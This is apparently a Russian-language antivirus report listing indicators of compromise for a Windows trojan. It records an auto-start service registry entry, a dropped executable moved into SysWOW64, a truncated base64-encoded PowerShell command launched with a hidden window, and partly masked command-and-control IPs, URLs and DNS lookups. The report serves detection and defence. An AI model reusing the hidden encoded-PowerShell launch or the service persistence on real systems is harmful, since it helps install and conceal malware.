Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\classmagnify] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\classmagnify] 'ImagePath' = '"%WINDIR%\SysWOW64\classmagnify.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAHYAbgBoAGgAeABtAGcAeQB4AGMAeAB6AD0AJwBWAGUAbgBtAHEAdgB6AHcAdwAnADsAJABFAGYAYQBtAGsAegB1AGgAcQB2AG...
- %HOMEPATH%\708.exe
- %HOMEPATH%\708.exe в %WINDIR%\syswow64\classmagnify.exe
- '86.##.221.170':80
- '18#.#44.61.73':443
- '18#.#4.252.13':443
- http://www.su####lkauthar.com/4qf0hn2/l24/
- http://18#.##.252.13:443/schema/report/
- DNS ASK tr####ech-id.com
- DNS ASK dp##nce.org
- DNS ASK su####lkauthar.com
- '%HOMEPATH%\708.exe'
- '%WINDIR%\syswow64\classmagnify.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAHYAbgBoAGgAeABtAGcAeQB4AGMAeAB6AD0AJwBWAGUAbgBtAHEAdgB6AHcAdwAnADsAJABFAGYAYQBtAGsAegB1AGgAcQB2AG...' (со скрытым окном)